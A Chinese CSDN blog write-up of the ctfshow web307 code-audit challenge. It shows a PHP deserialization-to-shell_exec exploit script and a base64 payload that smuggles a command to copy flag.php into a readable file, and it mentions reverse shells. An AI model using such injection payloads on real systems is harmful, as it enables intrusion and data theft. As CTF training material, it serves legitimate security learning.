ctfshow web307

最新推荐文章于 2024-03-13 09:31:18 发布
最新推荐文章于 2024-03-13 09:31:18 发布
阅读量295 收藏
点赞数 2
分类专栏: 代码审计 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/118739546
版权

是代码审计专题的
下载到源码
在这里插入图片描述
主要在dao.php和logout.php里面
dao.php里有个dao类,里面有个方法
在这里插入图片描述

在这里插入图片描述
在看logout.php
在这里插入图片描述
反序列化dao类 控制config里的cache_dir为我们的命令即可。
不过shell_exec函数有个特点
在这里插入图片描述
也就是说没回显,但写入文件就可以了,或者也可以反弹shell

<?php
class config{
    public $cache_dir = 'aaa/*;cat /var/www/html/flag.php > /var/www/html/1.txt;';
}
class dao
{
    private $config;
    public function __construct()
    {
        $this->config = new config();
    }
}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czo5OiJjYWNoZV9kaXIiO3M6NTU6ImFhYS8qO2NhdCAvdmFyL3d3dy9odG1sL2ZsYWcucGhwID4gL3Zhci93d3cvaHRtbC8xLnR4dDsiO319

在这里插入图片描述

fmyyy1
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFSHOW-WEB入门代码审计篇
Re_ly0n的博客
11-02 430
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
ctfshow 代码审计
qq_45951598的博客
05-21 707
web301 这里看了一下文件发现,就一些登入页面文件 然后简单看了一下文件,定位到checklogin.php这个文件,做个简单的代码审计 <?php error_reporting(0); session_start(); require 'conn.php'; $_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:""; //判断当前传入的userid是否为空,空的话返回为空 $_POST['userpwd']=!empty(
CTFshow 代码审计
starttv的博客
11-30 896
分析源码在dptadd.php有注入点,无过滤,但要求先登录,尝试弱口令admin,admin登录成功。所以我写入一个php查数据库的文件,可以正常查询。发现多了个class.php,并且在checklogin.php有反序列入口,到这里思路就清晰了。​协议的延时可以探测端口是否开放,开放的端口会保持连接,而未开放的端口会直接返回页面结果,经探测后。写入一句话木马后用蚁剑连接查数据库即可,数据库的用户名和密码可以在conn.php中找到。在index.php和login.php中发现反序列化入口。
ctfshow web入门 代码审计
Sentiment的博客
02-12 2879
web301
HTTP错误码307 Temporary Redirect
博客
08-15 5823
307 Temporary Redirect是一种HTTP重定向错误码,用于指示客户端发送的请求需要进一步重定向到另一个URL。与其他重定向错误码(如301永久重定向和302临时重定向)不同,307 Temporary Redirect要求客户端保持请求方法不变,并将请求重定向到新的URL。307 Temporary Redirect是一种在Web开发中常用的HTTP重定向错误码。它可以帮助开发人员实现请求的重定向,同时保持请求方法不变。
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFshow——代码审计
D.MIND 的博客
04-07 1476
文章目录web301——SQL注入web301——SQL注入web303——报错注入web304——报错注入web305——web306——web307—— web301——SQL注入 将源码下载下来。主要看checklogin.php: $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; $result=$mysqli->query($sql); $row=
ctfshow代码审计篇
qq_61768489的博客
01-26 1268
4476端口对应着 /var/flag目录,有个index.html文件,这和我们连上蚁剑后知道的一样。给的源码还是308,还是用fastcgi,这次直接写shell进去,因为flag文件不知道在哪。可以利用file_put_contents来写shell ,需要调用close()方法。思路与上题一样,不过是输入的password经过了一点加密,构造一下就行。sql注入写shell也是没问题的,因为sql语句依旧是正常执行了。似乎没有调用,与上题一样,换一种方式,有报错信息就试试报错注入。
ctf_show笔记篇(web入门---代码审计)
最新发布
whale_waves的博客
03-13 1124
在dao.php文件找到了当最后销毁序列化时调用close(__destruct魔法函数), 这里就要用到__construct魔法函数, 当执行new实例化的时候就会调用, 一会儿再去找哪里实例化了dao这个类, 将$this->config=new config()修改为$this->conn->=apt()这里$this->config->cache_dir指向了config类里的cache_dir变量, 刚好又是个public公共便变量可以修改。这里的'问好'像下面一样加密一下。
http的重定向状态码302,303,307
热门推荐
喜欢讨论、分享
06-28 1万+
在HTTP当中有些用于表示重定向的状态码,范围在3XX。这里主要说一下302,303和307的区别。     这三个状态码在平时都表现为重定向,服务器返回一个新的资源的地址,客户端去这个新的地址去获取资源。但是它们之间还是有些细微的区别的。我们通过仔细阅读RFC可以发现: 302 Found     302返回码指示资源临时在另一个位置,该位置通过Location指定。如果302响应
ctf.show代码审计(web301-web310)
wanan的博客
08-31 549
ctf.show代码审计(web301-web310)
ctfshow 代码审计 web301~310
shinygod的博客
09-24 798
知识点:SSRF--gopher协议打FastCGI(PHP-FPM的未授权访问漏洞),file伪协议,nginx配置文件
[CTFshow web入门]代码审计篇
Npceer-一位网安初学者的博客
08-09 477
前言 最近状态不太对 挺迷茫的 就先回来写点题练习练习 暑假也进入后半段了 摸鱼摸不动了 最近就学一下代码审计吧 找几个小CMS复现一下漏洞 然后在跟这Y4和feng师傅的博客复现一些框架好了 也稍微学一下工具的使用 sqlmap啊seay啊啥的 文章目录前言web301web302web302 web301 基础题 随便看一下 sql语句没有任何过滤 直接联合注入就行 $sql="select sds_password from sds_user where sds_username='".$usern
CTFSHOW 代码审计篇
羽的博客
12-19 4392
文章目录web301web302web303web304web305web306web307web308web309web310 web301 下载下来源码,发现checklogin.php里面的sql语句没有任何的过滤。 所以直接注入就可以了。用sqlmap跑了下得到用户名密码 admin ctfshowwwww登陆进去就有flag python sqlmap.py -u http://e62c174a-c4d4-4a58-a392-a41bfca926ee.chall.ctf.show/checkl
CTFshow-WEB入门-代码审计
feng的博客
02-22 1706
前言 开始快乐的代码审计篇。 web301 源码下载下来分析一波,大部分都是无用的文件,主要还是在checklogin.php那里: $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; $result=$mysqli->query($sql); $row=$result->fetch_array(MYSQLI_BOTH); if($result->
ctfshow web 41
08-20
根据引用,ctfshow web 41 是一个命令盲注脚本,它属于ctfshow靶场的web入门系列。根据引用,这个脚本可能存在一些问题,所以如果你有任何问题,可以向ctfshow web 41的作者提问。根据引用,在ctfshow web 41的实现...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值